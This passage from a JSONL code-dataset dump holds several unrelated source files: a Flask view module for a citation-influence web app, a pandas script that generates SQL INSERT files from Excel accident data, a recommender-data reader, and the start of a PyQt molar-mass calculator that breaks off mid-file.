f\"http://influencemap.ml/submit/?id={doc_id}\"\n\n session = dict(\n author_ids=author_ids, affiliation_ids=affiliation_ids,\n conference_ids=conference_ids, journal_ids=journal_ids,\n fos_ids=fos_ids, paper_ids=paper_ids, flower_name=flower_name,\n url_base=url_base, icoauthor=coauthors, self_cite=self_citations)\n\n rdata = make_response_data(\n flower, stats, is_curated=curated_flag, flower_name=flower_name,\n session=session, selection=dict(\n pub_years=pub_years, cit_years=cit_years, coauthors=coauthors,\n self_citations=self_citations))\n return flask.render_template(\"flower.html\", **rdata)\n\n\n@blueprint.route('/resubmit/', methods=['POST'])\ndef resubmit():\n # option = request.form.get('option')\n # keyword = request.form.get('keyword')\n # flower_config['reference'] = request.form.get('cmp_ref') == 'true'\n # flower_config['num_leaves'] = int(request.form.get('numpetals'))\n # flower_config['order'] = request.form.get('petalorder')\n\n session = json.loads(request.form.get(\"session\"))\n flower_name = session['flower_name']\n author_ids = session['author_ids']\n affiliation_ids = session['affiliation_ids']\n conference_ids = session['conference_ids']\n journal_ids = session['journal_ids']\n fos_ids = session['fos_ids']\n paper_ids = session['paper_ids']\n\n self_citations = request.form.get('selfcite') == 'true'\n coauthors = request.form.get('coauthor') == 'true'\n pub_lower = int(request.form.get('from_pub_year'))\n pub_upper = int(request.form.get('to_pub_year'))\n cit_lower = int(request.form.get('from_cit_year'))\n cit_upper = int(request.form.get('to_cit_year'))\n\n flower = kb_client.get_flower(\n author_ids=author_ids, affiliation_ids=affiliation_ids,\n conference_series_ids=conference_ids, field_of_study_ids=fos_ids,\n journal_ids=journal_ids, paper_ids=paper_ids,\n pub_years=(pub_lower, pub_upper), cit_years=(cit_lower, cit_upper),\n coauthors=coauthors, self_citations=self_citations)\n\n rdata = make_response_data(\n flower, flower_name=flower_name, session=session)\n\n return flask.jsonify(rdata)\n\n\ndef conf_journ_to_display_names(papers):\n conf_journ_ids = {\"ConferenceSeriesIds\": [], \"JournalIds\": []}\n for paper in papers.values():\n if \"ConferenceSeriesId\" in paper: conf_journ_ids[\"ConferenceSeriesIds\"].append(paper[\"ConferenceSeriesId\"])\n if \"JournalId\" in paper: conf_journ_ids[\"JournalIds\"].append(paper[\"JournalId\"])\n conf_journ_display_names = get_conf_journ_display_names(conf_journ_ids)\n for paper in papers.values():\n if \"ConferenceSeriesId\" in paper:\n paper[\"ConferenceName\"] = conf_journ_display_names[\"Conference\"][paper[\"ConferenceSeriesId\"]]\n if \"JournalId\" in paper:\n paper[\"JournalName\"] = conf_journ_display_names[\"Journal\"][paper[\"JournalId\"]]\n return papers\n\n\n@blueprint.route('/get_publication_papers')\ndef get_publication_papers():\n request_data = json.loads(request.form.get(\"data_string\"))\n session = request_data.get(\"session\")\n\n pub_year_min = int(request.form.get(\"pub_year_min\"))\n pub_year_max = int(request.form.get(\"pub_year_max\"))\n paper_ids = session['cache']\n papers = paper_info_db_check_multiquery(paper_ids)\n papers = [paper for paper in papers if (paper[\"Year\"] >= pub_year_min and paper[\"Year\"] <= pub_year_max)]\n papers = conf_journ_to_display_names({paper[\"PaperId\"]: paper for paper in papers})\n return flask.jsonify({\"papers\": papers, \"names\": session[\"entity_names\"]+ session[\"node_info\"]})\n\n\n@blueprint.route('/get_citation_papers')\ndef 
get_citation_papers():\n # request should contain the ego author ids and the node author ids separately\n request_data = json.loads(request.form.get(\"data_string\"))\n session = request_data.get(\"session\")\n\n cite_year_min = int(request.form.get(\"cite_year_min\"))\n cite_year_max = int(request.form.get(\"cite_year_max\"))\n pub_year_min = int(request.form.get(\"pub_year_min\"))\n pub_year_max = int(request.form.get(\"pub_year_max\"))\n paper_ids = session['cache']\n papers = paper_info_db_check_multiquery(paper_ids)\n cite_papers = [[citation for citation in paper[\"Citations\"] if (citation[\"Year\"] >= cite_year_min and citation[\"Year\"] <= cite_year_max)] for paper in papers if (paper[\"Year\"] >= pub_year_min and paper[\"Year\"] <= pub_year_max)]\n citations = sum(cite_papers,[])\n citations = conf_journ_to_display_names({paper[\"PaperId\"]: paper for paper in citations})\n\n return flask.jsonify({\"papers\": citations, \"names\": session[\"entity_names\"] + session[\"node_info\"],\"node_info\": session[\"node_information_store\"]})\n\n\ndef get_entities(paper):\n ''' Gets the entities of a paper\n '''\n authors = [author[\"AuthorName\"] for author in paper[\"Authors\"]]\n affiliations = [author[\"AffiliationName\"] for author in paper[\"Authors\"] if \"AffiliationName\" in author]\n conferences = [paper[\"ConferenceName\"]] if (\"ConferenceName\" in paper) else []\n journals = [paper[\"JournalName\"]] if (\"JournalName\" in paper) else []\n fieldsofstudy = [fos[\"FieldOfStudyName\"] for fos in paper[\"FieldsOfStudy\"] if fos[\"FieldOfStudyLevel\"] == 1] if (\"FieldsOfStudy\" in paper) else []\n\n return authors, affiliations, conferences, journals, fieldsofstudy\n\n\nNODE_INFO_FIELDS = [\"PaperTitle\", \"Authors\", \"PaperId\", \"Year\", \"ConferenceName\",\n \"ConferenceSeriesId\", \"JournalName\", \"JournalId\"]\n\n\ndef get_node_info_single(entity, entity_type, year_ranges):\n # Determine the citation range\n pub_lower = year_ranges[\"pub_lower\"]\n pub_upper = year_ranges[\"pub_upper\"]\n cit_lower = year_ranges[\"cit_lower\"]\n cit_upper = year_ranges[\"cit_upper\"]\n\n # Get paper to get information from\n request_data = json.loads(request.form.get(\"data_string\"))\n session = request_data.get(\"session\")\n papers = paper_info_db_check_multiquery(session[\"cache\"])\n\n # Get coauthors list to filter\n if session['icoauthor'] == 'false':\n coauthors = session['coauthors']\n else:\n coauthors = list()\n\n # Get self_citation list to filter\n if session['self_cite'] == 'false':\n self = session['entity_names']\n else:\n self = list()\n\n # Results\n papers_to_send = dict()\n links = dict()\n\n for paper in papers:\n # Publication range filter\n if paper[\"Year\"] < pub_lower or paper[\"Year\"] > pub_upper:\n continue\n\n for link_type in [\"References\", \"Citations\"]:\n for rel_paper in paper[link_type]:\n # Citation range filter\n if link_type == \"Citations\" and \\\n (rel_paper[\"Year\"] < cit_lower or rel_paper[\"Year\"] > cit_upper):\n continue\n\n # Get fields\n auth, inst, conf, jour, fos = get_entities(rel_paper)\n fields = dict()\n fields['author'] = set(auth)\n fields['inst'] = set(inst)\n fields['conf'] = set(conf + jour)\n fields['fos'] = set(fos)\n\n check = dict()\n check['author'] = coauthors + self\n check['inst'] = coauthors + self\n check['conf'] = coauthors\n check['fos'] = list()\n\n skip = False\n for n_type, check_val in check.items():\n if not set(check_val).isdisjoint(fields[entity_type]):\n skip = True\n break\n if skip:\n continue\n\n if entity 
not in fields[entity_type]:\n continue\n\n papers_to_send[paper[\"PaperId\"]] = {k:v for k,v in paper.items() if k in NODE_INFO_FIELDS}\n papers_to_send[paper[\"PaperId\"]] = add_author_order(papers_to_send[paper[\"PaperId\"]])\n\n papers_to_send[rel_paper[\"PaperId\"]] = {k:v for k,v in rel_paper.items() if k in NODE_INFO_FIELDS}\n papers_to_send[rel_paper[\"PaperId\"]] = add_author_order(papers_to_send[rel_paper[\"PaperId\"]])\n\n if link_type == \"Citations\":\n if paper[\"PaperId\"] in links:\n links[paper[\"PaperId\"]][\"reference\"].append(rel_paper[\"PaperId\"])\n else:\n links[paper[\"PaperId\"]] = {\"reference\": [rel_paper[\"PaperId\"]], \"citation\": list()}\n else:\n if paper[\"PaperId\"] in links:\n links[paper[\"PaperId\"]][\"citation\"].append(rel_paper[\"PaperId\"])\n else:\n links[paper[\"PaperId\"]] = {\"citation\": [rel_paper[\"PaperId\"]], \"reference\": list()}\n\n paper_sort_func = lambda x: -papers_to_send[x][\"Year\"]\n links = sorted([{\"citation\": sorted(link[\"citation\"],key=paper_sort_func), \"reference\": sorted(link[\"reference\"],key=paper_sort_func), \"ego_paper\": key} for key, link in links.items()], key=lambda x: paper_sort_func(x[\"ego_paper\"]))\n\n return {\"node_name\": entity, \"node_type\": entity_type, \"node_links\": links, \"paper_info\": papers_to_send}\n\n\n\n@blueprint.route('/get_node_info/', methods=['POST'])\ndef get_node_info():\n request_data = json.loads(request.form.get(\"data_string\"))\n node_name = request_data.get(\"name\")\n node_type = request_data.get(\"node_type\")\n session = request_data.get(\"session\")\n year_ranges = session[\"year_ranges\"]\n flower_name = session[\"flower_name\"]\n\n data = get_node_info_single(node_name, node_type, year_ranges)\n data[\"node_name\"] = node_name\n data[\"flower_name\"] = flower_name\n data[\"max_page\"] = math.ceil(len(data[\"node_links\"]) / 5)\n data[\"node_links\"] = data[\"node_links\"][0:min(5, len(data[\"node_links\"]))]\n return flask.jsonify(data)\n\n\n\n@blueprint.route('/get_next_node_info_page/', methods=['POST'])\ndef get_next_node_info_page():\n request_data = json.loads(request.form.get(\"data_string\"))\n node_name = request_data.get(\"name\")\n node_type = request_data.get(\"node_type\")\n session = request_data.get(\"session\")\n year_ranges = session[\"year_ranges\"]\n page = int(request_data.get(\"page\"))\n\n node_info = get_node_info_single(node_name, node_type, year_ranges)\n page_length = 5\n page_info = {\"paper_info\": node_info[\"paper_info\"], \"node_links\": node_info[\"node_links\"][0+page_length*(page-1):min(page_length*page, len(node_info[\"node_links\"]))]}\n return flask.jsonify(page_info)\n","sub_path":"webapp/views.py","file_name":"views.py","file_ext":"py","file_size_in_byte":19971,"program_lang":"python","lang":"en","doc_type":"code","dataset":"code-starcoder2","pt":"62"} +{"seq_id":"601961593","text":"import pandas as pd\nimport pickle\n\n\n\ndef parser_datos(archivo,columna,tabla,atributos):\n\texcel_prueba = pd.read_excel(archivo+\".xlsx\")\n\tdiccionario = {}\n\tlargo_archivo = len(excel_prueba.index)\n\n\tfile_guardar= open(archivo+\".txt\",\"w+\")\n\n\tfor i in range(largo_archivo):\n\t\tprovincia_texto = excel_prueba.loc[[i]][columna][i]\n\t\tdiccionario[provincia_texto] = i\n\n\t\tfile_guardar.write(\"INSERT INTO %s(%s) VALUES(%d,\\\"%s\\\");\\n\" % (tabla,atributos,i,provincia_texto))\n\n\tf = open(archivo+\".pkl\",\"wb\")\n\tpickle.dump(diccionario,f)\n\tf.close()\n\tfile_guardar.close() \n\t#print(diccionario_distritos)\n\ndef 
abrir_diccionario(archivo):\n\tfile = open(archivo+\".pkl\", 'rb')\n\tdiccionario_distritos = pickle.load(file)\n\t#print(diccionario_distritos)\n\treturn diccionario_distritos\n\ndef parser_datos_totales(archivo):\n\tdiccionario_distrito = abrir_diccionario(\"distritos\")\n\tdiccionario_provincia = abrir_diccionario(\"provincias\")\n\tdiccionario_canton = abrir_diccionario(\"cantones\")\n\tdiccionario_anho = abrir_diccionario(\"anhos\")\n\tdiccionario_mes = abrir_diccionario(\"meses\")\n\tdiccionario_dia = abrir_diccionario(\"dias\")\n\tdiccionario_rol = abrir_diccionario(\"roles\")\n\tdiccionario_sexo = abrir_diccionario(\"sexos\")\n\tdiccionario_lesion = abrir_diccionario(\"lesiones\")\n\n\texcel_leer = pd.read_excel(archivo+\".xlsx\")\n\tlargo_archivo = len(excel_leer.index)\n\n\tfecha_incidente_guardar= open(\"fecha_incidente.txt\",\"w+\")\n\tlocalizacion_guardar= open(\"localizacion.txt\",\"w+\")\n\tincidente_guardar= open(\"incidente.txt\",\"w+\")\n\tafectado_guardar= open(\"afectado.txt\",\"w+\")\n\n\tfor i in range(largo_archivo):\n\t\tdia_excel = excel_leer.loc[[i]][\"Día\"][i]\n\t\tmes_excel = excel_leer.loc[[i]][\"Mes\"][i]\n\t\tanho_excel = excel_leer.loc[[i]][\"Año\"][i]\n\n\t\tdia_numero_tabla = diccionario_dia[dia_excel]\n\t\tmes_numero_tabla = diccionario_mes[mes_excel]\n\t\tanho_numero_tabla = diccionario_anho[anho_excel]\n\n\t\tinsercion_fecha_incidente = \"INSERT INTO FechaIncidente(codigoFechaIncidente,codigoAnho,codigoMes,codigoDia) VALUES(%d,%d,%d,%d);\\n\"%(i,anho_numero_tabla,mes_numero_tabla,dia_numero_tabla)\n\n\t\tfecha_incidente_guardar.write(insercion_fecha_incidente)\n\n\t\tprovincia_excel = excel_leer.loc[[i]][\"Provincia\"][i]\n\t\tcanton_excel = excel_leer.loc[[i]][\"Cantón\"][i]\n\t\tdistrito_excel = excel_leer.loc[[i]][\"Distrito\"][i]\n\n\t\tprovincia_numero_tabla = diccionario_provincia[provincia_excel]\n\t\tcanton_numero_tabla = diccionario_canton[canton_excel]\n\t\tdistrito_numero_tabla = diccionario_distrito[distrito_excel]\n\n\t\tinsercion_localizacion = \"INSERT INTO Localizacion(codigoLocalizacion,codigoProvincia,codigoCanton,codigoDistrito) VALUES(%d,%d,%d,%d);\\n\"%(i,provincia_numero_tabla,canton_numero_tabla,distrito_numero_tabla)\n\n\t\tlocalizacion_guardar.write(insercion_localizacion)\n\n\t\trol_excel = excel_leer.loc[[i]][\"Rol\"][i]\n\t\tsexo_excel = excel_leer.loc[[i]][\"Sexo\"][i]\n\t\tlesion_excel = excel_leer.loc[[i]][\"Tipo de Lesión\"][i]\n\t\tedad_excel = excel_leer.loc[[i]][\"Edad\"][i]\n\t\tedad_quinquenal_excel = excel_leer.loc[[i]][\"Edadquinquenal\"][i]\n\n\t\trol_numero_tabla = diccionario_rol[rol_excel]\n\t\tsexo_numero_tabla = diccionario_sexo[sexo_excel]\n\t\tlesion_numero_tabla = diccionario_lesion[lesion_excel]\n\n\t\tinsercion_afectado = \"INSERT INTO Afectado(codigoAfectado,codigoRol,codigoSexo,codigoLesion,edad,edadQuinquenal) VALUES(%d,%d,%d,%d,\\\"%s\\\",\\\"%s\\\");\\n\"%(i,rol_numero_tabla,sexo_numero_tabla,lesion_numero_tabla,edad_excel,edad_quinquenal_excel)\n\n\t\tafectado_guardar.write(insercion_afectado)\n\n\t\tinsercion_incidente = \"INSERT INTO Incidente(codigoRegistro,codigoLocalizacion,codigoFecha,codigoAfectado) VALUES(%d,%d,%d,%d);\\n\"%((i+1),i,i,i)\n\n\t\tincidente_guardar.write(insercion_incidente)\n\n\tfecha_incidente_guardar.close()\n\tlocalizacion_guardar.close()\n\tincidente_guardar.close()\n\tafectado_guardar.close()\n\ndef parser_datos_totales_forma2(archivo):\n\tdiccionario_distrito = abrir_diccionario(\"distritos\")\n\tdiccionario_provincia = 
abrir_diccionario(\"provincias\")\n\tdiccionario_canton = abrir_diccionario(\"cantones\")\n\tdiccionario_anho = abrir_diccionario(\"anhos\")\n\tdiccionario_mes = abrir_diccionario(\"meses\")\n\tdiccionario_dia = abrir_diccionario(\"dias\")\n\tdiccionario_rol = abrir_diccionario(\"roles\")\n\tdiccionario_sexo = abrir_diccionario(\"sexos\")\n\tdiccionario_lesion = abrir_diccionario(\"lesiones\")\n\n\texcel_leer = pd.read_excel(archivo+\".xlsx\")\n\tlargo_archivo = len(excel_leer.index)\n\n\tfecha_incidente_guardar= open(\"fecha_incidente.txt\",\"w+\")\n\tlocalizacion_guardar= open(\"localizacion.txt\",\"w+\")\n\tincidente_guardar= open(\"incidente.txt\",\"w+\")\n\tafectado_guardar= open(\"afectado.txt\",\"w+\")\n\n\tprimer_linea_fecha_incidente = \"INSERT INTO FechaIncidente(codigoFechaIncidente,codigoAnho,codigoMes,codigoDia) VALUES\"\n\tfecha_incidente_guardar.write(primer_linea_fecha_incidente)\n\n\tprimer_linea_localizacion = \"INSERT INTO Localizacion(codigoLocalizacion,codigoProvincia,codigoCanton,codigoDistrito) VALUES\"\n\tlocalizacion_guardar.write(primer_linea_localizacion)\n\n\tprimer_linea_afectado = \"INSERT INTO Afectado(codigoAfectado,codigoRol,codigoSexo,codigoLesion,edad,edadQuinquenal) VALUES\"\n\tafectado_guardar.write(primer_linea_afectado)\n\n\tprimer_linea_incidente = \"INSERT INTO Incidente(codigoRegistro,codigoLocalizacion,codigoFechaIncidente,codigoAfectado) VALUES\"\n\tincidente_guardar.write(primer_linea_incidente)\n\tfor i in range(largo_archivo):\n\t\tdia_excel = excel_leer.loc[[i]][\"Día\"][i]\n\t\tmes_excel = excel_leer.loc[[i]][\"Mes\"][i]\n\t\tanho_excel = excel_leer.loc[[i]][\"Año\"][i]\n\n\t\tdia_numero_tabla = diccionario_dia[dia_excel]\n\t\tmes_numero_tabla = diccionario_mes[mes_excel]\n\t\tanho_numero_tabla = diccionario_anho[anho_excel]\n\n\t\tif (i+1 == largo_archivo):\n\t\t\tinsercion_fecha_incidente = \"(%d,%d,%d,%d);\\n\"%(i,anho_numero_tabla,mes_numero_tabla,dia_numero_tabla)\n\t\telse:\n\t\t\tinsercion_fecha_incidente = \"(%d,%d,%d,%d),\\n\"%(i,anho_numero_tabla,mes_numero_tabla,dia_numero_tabla)\n\n\t\tfecha_incidente_guardar.write(insercion_fecha_incidente)\n\n\t\tprovincia_excel = excel_leer.loc[[i]][\"Provincia\"][i]\n\t\tcanton_excel = excel_leer.loc[[i]][\"Cantón\"][i]\n\t\tdistrito_excel = excel_leer.loc[[i]][\"Distrito\"][i]\n\n\t\tprovincia_numero_tabla = diccionario_provincia[provincia_excel]\n\t\tcanton_numero_tabla = diccionario_canton[canton_excel]\n\t\tdistrito_numero_tabla = diccionario_distrito[distrito_excel]\n\n\t\tif (i+1 == largo_archivo):\n\t\t\tinsercion_localizacion = \"(%d,%d,%d,%d);\\n\"%(i,provincia_numero_tabla,canton_numero_tabla,distrito_numero_tabla)\n\t\telse:\n\t\t\tinsercion_localizacion = \"(%d,%d,%d,%d),\\n\"%(i,provincia_numero_tabla,canton_numero_tabla,distrito_numero_tabla)\n\n\t\tlocalizacion_guardar.write(insercion_localizacion)\n\n\t\trol_excel = excel_leer.loc[[i]][\"Rol\"][i]\n\t\tsexo_excel = excel_leer.loc[[i]][\"Sexo\"][i]\n\t\tlesion_excel = excel_leer.loc[[i]][\"Tipo de Lesión\"][i]\n\t\tedad_excel = excel_leer.loc[[i]][\"Edad\"][i]\n\t\tedad_quinquenal_excel = excel_leer.loc[[i]][\"Edadquinquenal\"][i]\n\n\t\trol_numero_tabla = diccionario_rol[rol_excel]\n\t\tsexo_numero_tabla = diccionario_sexo[sexo_excel]\n\t\tlesion_numero_tabla = diccionario_lesion[lesion_excel]\n\n\t\tif (i+1 == largo_archivo):\n\t\t\tinsercion_afectado = \"(%d,%d,%d,%d,\\\"%s\\\",\\\"%s\\\");\\n\"%(i,rol_numero_tabla,sexo_numero_tabla,lesion_numero_tabla,edad_excel,edad_quinquenal_excel)\n\t\telse:\n\t\t\tinsercion_afectado = 
\"(%d,%d,%d,%d,\\\"%s\\\",\\\"%s\\\"),\\n\"%(i,rol_numero_tabla,sexo_numero_tabla,lesion_numero_tabla,edad_excel,edad_quinquenal_excel)\n\n\t\tafectado_guardar.write(insercion_afectado)\t\n\n\t\tif (i+1 == largo_archivo):\n\t\t\tinsercion_incidente = \"(%d,%d,%d,%d);\\n\"%((i+1),i,i,i)\n\t\telse:\n\t\t\tinsercion_incidente = \"(%d,%d,%d,%d),\\n\"%((i+1),i,i,i)\n\n\t\tincidente_guardar.write(insercion_incidente)\n\n\tfecha_incidente_guardar.close()\n\tlocalizacion_guardar.close()\n\tincidente_guardar.close()\n\tafectado_guardar.close()\n\n\n\ndef parser_datos_tabla_completa(archivo):\n\n\texcel_leer = pd.read_excel(archivo+\".xlsx\")\n\tlargo_archivo = len(excel_leer.index)\n\n\ttabla_total_1_guardar= open(\"tabla_dios1.txt\",\"w+\")\n\ttabla_total_2_guardar= open(\"tabla_dios2.txt\",\"w+\")\n\n\tprimer_linea_tabla_total = \"INSERT INTO IncidenteCompleto(codigoRegistro,nombreProvincia,nombreCanton,nombreDistrito,nombreDia,nombreMes,nombreAnho,nombreRol,nombreSexo,nombreLesion,edad,edadQuinquenal) VALUES\"\n\ttabla_total_1_guardar.write(primer_linea_tabla_total)\n\ttabla_total_2_guardar.write(primer_linea_tabla_total)\n\n\tlargo_1 = largo_archivo//2\n\n\tlargo_2 = (largo_archivo//2)+(largo_archivo%2)\n\n\tcontador = 0\n\n\tfor i in range(largo_1):\n\t\t\n\t\tprovincia_excel = excel_leer.loc[[i]][\"Provincia\"][i]\n\t\tcanton_excel = excel_leer.loc[[i]][\"Cantón\"][i]\n\t\tdistrito_excel = excel_leer.loc[[i]][\"Distrito\"][i]\n\t\tdia_excel = excel_leer.loc[[i]][\"Día\"][i]\n\t\tmes_excel = excel_leer.loc[[i]][\"Mes\"][i]\n\t\tanho_excel = excel_leer.loc[[i]][\"Año\"][i]\n\t\trol_excel = excel_leer.loc[[i]][\"Rol\"][i]\n\t\tsexo_excel = excel_leer.loc[[i]][\"Sexo\"][i]\n\t\tlesion_excel = excel_leer.loc[[i]][\"Tipo de Lesión\"][i]\n\t\tedad_excel = excel_leer.loc[[i]][\"Edad\"][i]\n\t\tedad_quinquenal_excel = excel_leer.loc[[i]][\"Edadquinquenal\"][i]\n\n\t\t\n\t\tinsercion_tabla_zeus = \"(%d,\\\"%s\\\",\\\"%s\\\",\\\"%s\\\",\\\"%s\\\",\\\"%s\\\",\\\"%s\\\",\\\"%s\\\",\\\"%s\\\",\\\"%s\\\",\\\"%s\\\",\\\"%s\\\"),\\n\"%((contador+1),provincia_excel,canton_excel,distrito_excel,dia_excel,mes_excel,anho_excel,rol_excel,sexo_excel,lesion_excel,edad_excel,edad_quinquenal_excel)\n\n\t\ttabla_total_1_guardar.write(insercion_tabla_zeus)\n\n\t\tcontador +=1\n\n\tfor i in range(largo_2):\n\t\t\n\t\tprovincia_excel = excel_leer.loc[[i+contador]][\"Provincia\"][i+contador]\n\t\tcanton_excel = excel_leer.loc[[i+contador]][\"Cantón\"][i+contador]\n\t\tdistrito_excel = excel_leer.loc[[i+contador]][\"Distrito\"][i+contador]\n\t\tdia_excel = excel_leer.loc[[i+contador]][\"Día\"][i+contador]\n\t\tmes_excel = excel_leer.loc[[i+contador]][\"Mes\"][i+contador]\n\t\tanho_excel = excel_leer.loc[[i+contador]][\"Año\"][i+contador]\n\t\trol_excel = excel_leer.loc[[i+contador]][\"Rol\"][i+contador]\n\t\tsexo_excel = excel_leer.loc[[i+contador]][\"Sexo\"][i+contador]\n\t\tlesion_excel = excel_leer.loc[[i+contador]][\"Tipo de Lesión\"][i+contador]\n\t\tedad_excel = excel_leer.loc[[i+contador]][\"Edad\"][i+contador]\n\t\tedad_quinquenal_excel = excel_leer.loc[[i+contador]][\"Edadquinquenal\"][i+contador]\n\n\t\t\n\t\tinsercion_tabla_zeus = 
\"(%d,\\\"%s\\\",\\\"%s\\\",\\\"%s\\\",\\\"%s\\\",\\\"%s\\\",\\\"%s\\\",\\\"%s\\\",\\\"%s\\\",\\\"%s\\\",%s,\\\"%s\\\"),\\n\"%((i+contador+1),provincia_excel,canton_excel,distrito_excel,dia_excel,mes_excel,anho_excel,rol_excel,sexo_excel,lesion_excel,edad_excel,edad_quinquenal_excel)\n\n\t\ttabla_total_2_guardar.write(insercion_tabla_zeus)\n\n\n\n\ttabla_total_1_guardar.close()\n\ttabla_total_2_guardar.close()\n\n\n\ndef divirdirArchivo(archivo):\n\tarchivo_divir = open(archivo, \"r\")\n\t\n\tline = archivo_divir.readline()\n\tcontador_parte = 0\n\n\tparte1 = open(\"parte1_division.txt\",\"w+\")\n\tparte2 = open(\"parte2_division.txt\",\"w+\")\n\tparte3 = open(\"parte3_division.txt\",\"w+\")\n\tparte4 = open(\"parte4_division.txt\",\"w+\")\n\n\tparte1.write(line)\n\tparte2.write(line)\n\tparte3.write(line)\n\tparte4.write(line)\n\n\tline = archivo_divir.readline()\n\n\twhile line:\n\t\tif (contador_parte == 0):\n\t\t\tparte1.write(line)\n\t\t\tcontador_parte+=1\n\t\telif(contador_parte == 1):\n\t\t\tparte2.write(line)\n\t\t\tcontador_parte+=1\n\t\telif(contador_parte == 2):\n\t\t\tparte3.write(line)\n\t\t\tcontador_parte+=1\n\t\telse:\n\t\t\tparte4.write(line)\n\t\t\tcontador_parte = 0\n\t\tline = archivo_divir.readline()\n\n\tparte1.close()\n\tparte2.close()\n\tparte3.close()\n\tparte4.close()\n\tarchivo_divir.close()\n\n \n\n\ndivirdirArchivo(\"tabla_dios2.txt\")\n #array = []\n #for line in ins:\n # array.append(line)'''\n#INSERT INTO Dia(codigoDia,nombreDia) VALUES(3,\"PRUEBA\")\n\n#print(excel_prueba[0])\n#abrir_diccionario(\"diccionario_distritos\")\n\n#parser_datos(\"distritos\",\"Distritos\",\"Distrito\",\"codigoDistrito,nombreDistrito\")\n#parser_datos(\"cantones\",\"Canton\",\"Canton\",\"codigoCanton,nombreCanton\")\n#parser_datos(\"dias\",\"Dia\",\"Dia\",\"codigoDia,nombreDia\")\n#parser_datos(\"meses\",\"Mes\",\"Mes\",\"codigoMes,nombreMes\")\n#parser_datos(\"anhos\",\"Anho\",\"Anho\",\"codigoAnho,nombreAnho\")\n#parser_datos(\"roles\",\"Rol\",\"Rol\",\"codigoRol,nombreRol\")\n#parser_datos(\"lesiones\",\"Lesion\",\"Lesion\",\"codigoLesion,nombreLesion\")\n#parser_datos(\"sexos\",\"Sexo\",\"Sexo\",\"codigoSexo,nombreSexo\")\n#parser_datos(\"provincias\",\"Provincia\",\"Provincia\",\"codigoProvincia,nombreProvincia\")\n\n#parser_datos_totales(\"acc1\")\n#parser_datos_totales_forma2(\"acc1\")\n\n#parser_datos_tabla_completa(\"acc1\")\n#divirdirArchivo(\"tabla_dios1.txt\")\n#print(\"Column headings:\")\n#print(excel_prueba.columns)\n","sub_path":"generacion_inserts_base_datos/prueba_excel.py","file_name":"prueba_excel.py","file_ext":"py","file_size_in_byte":12273,"program_lang":"python","lang":"en","doc_type":"code","dataset":"code-starcoder2","pt":"62"} +{"seq_id":"46966840","text":"# -*- coding: utf-8 -*-\n\n\"\"\"\n@author: Quoc-Tuan Truong \n\"\"\"\n\nimport itertools\n\n\ndef read_uir(fpath, u_col=0, i_col=1, r_col=2, sep='\\t', skip_lines=0):\n \"\"\"Read data in the form of triplets (user, item, rating).\n\n Parameters\n ----------\n fpath: str\n Path to the data file\n\n u_col: int, default: 0\n Index of the user column\n\n i_col: int, default: 1\n Index of the item column\n\n r_col: int, default: 2\n Index of the rating column\n\n sep: str, default: \\t\n The delimiter string.\n\n skip_lines: int, default: 0\n Number of first lines to skip\n\n Returns\n -------\n triplets: :obj:`iterable`\n Data in the form of list of tuples of (user, item, rating).\n\n \"\"\"\n triplets = []\n with open(fpath, 'r') as f:\n for line in itertools.islice(f, skip_lines, None):\n tokens = 
[token.strip() for token in line.split(sep)]\n            triplets.append((tokens[u_col], tokens[i_col], float(tokens[r_col])))\n    return triplets\n\n\ndef read_ui(fpath, value=1.0, sep='\\t', skip_lines=0):\n    \"\"\"Read data in the form of implicit feedback user-items.\n    Each line starts with a user id followed by multiple item ids.\n\n    Parameters\n    ----------\n    fpath: str\n        Path to the data file\n\n    value: float, default: 1.0\n        Value for the feedback\n\n    sep: str, default: \\t\n        The delimiter string.\n\n    skip_lines: int, default: 0\n        Number of first lines to skip\n\n    Returns\n    -------\n    triplets: :obj:`iterable`\n        Data in the form of list of tuples of (user, item, 1).\n\n    \"\"\"\n    triplets = []\n    with open(fpath, 'r') as f:\n        for line in itertools.islice(f, skip_lines, None):\n            tokens = [token.strip() for token in line.split(sep)]\n            # emit tuples, not lists, so the result matches the docstring\n            triplets.extend((tokens[0], iid, value) for iid in tokens[1:])\n    return triplets","sub_path":"cornac/data/reader.py","file_name":"reader.py","file_ext":"py","file_size_in_byte":1885,"program_lang":"python","lang":"en","doc_type":"code","dataset":"code-starcoder2","pt":"62"}
{"seq_id":"198977640","text":"import sys\r\nimport math\r\n\r\nfrom PyQt5 import QtCore, QtWidgets\r\nfrom PyQt5.QtWidgets import QMainWindow, QWidget, QLabel, QLineEdit, QApplication\r\nfrom PyQt5.QtWidgets import QPushButton\r\nfrom PyQt5.QtCore import QSize\r\nfrom PyQt5.QtGui import QIcon\r\nimport sqlite3\r\nimport re\r\n\r\n\r\ncon = sqlite3.connect(\"chemi.db\")\r\ncon.row_factory = sqlite3.Row\r\ncur = con.cursor()\r\n\r\n\r\ndef find_atom(simbol):\r\n    # looks up the atom's mass in the DB (with a bit of magic) and returns it\r\n    cur.execute('SELECT * FROM chemical')\r\n    simbol = (simbol,)\r\n    sql_find = 'SELECT Weight FROM Chemical WHERE simbol=?'\r\n    cur.execute(sql_find, simbol)\r\n    simbol_notes = cur.fetchone()\r\n    atom = simbol_notes['Weight']\r\n    atom = float(atom)\r\n    return atom\r\n\r\n\r\ndef moll_mass(k):\r\n    formula = k\r\n\r\n    sFormula = formula\r\n\r\n    # print(\"Original Formula: \", sFormula)\r\n\r\n    # Expand parenthesised groups, e.g. Ca(OH)2 -> CaOHOH\r\n\r\n    myRegEx = re.compile(r\"(\\()(\\w*)(\\))(\\d*)\", re.I)\r\n\r\n    myMatches = myRegEx.findall(sFormula)\r\n\r\n    while myMatches:\r\n        myMatches = myRegEx.findall(sFormula)\r\n        for match in myMatches:\r\n            # print(match[1], match[3])\r\n            count = match[3]\r\n            text = \"\"\r\n            if count == \"\":\r\n                count = 1\r\n            else:\r\n                count = int(match[3])\r\n            while count >= 1:\r\n                text = text + match[1]\r\n                count -= 1\r\n            # print(text)\r\n            sFormula = sFormula.replace('(' + match[1] + ')' + match[3], text)\r\n    # print(\"Replaced formula: \", sFormula)\r\n\r\n    myRegEx = re.compile(\"(C[laroudsemf]?|Os?|N[eaibdpos]?|S[icernbmg]?\"\r\n                         \"|P[drmtboau]?|H[eofgas]?|A[lrsgutcm]|B[eraik]?|Dy|E[urs]|F[erm]?|G\"\r\n                         \"[\"\"aed]|I[nr]?|Kr?|L[iaur]|M[gnodt]|R[buhenaf]|T[icebmalh]|U|V|W|Xe|Yb?|Z[nr])(\\d*)\")\r\n\r\n    myMatches = myRegEx.findall(sFormula)\r\n\r\n    molecularFormula = \"\"\r\n    MW = 0\r\n    text = \"\"\r\n\r\n    for match in myMatches:\r\n        # Search 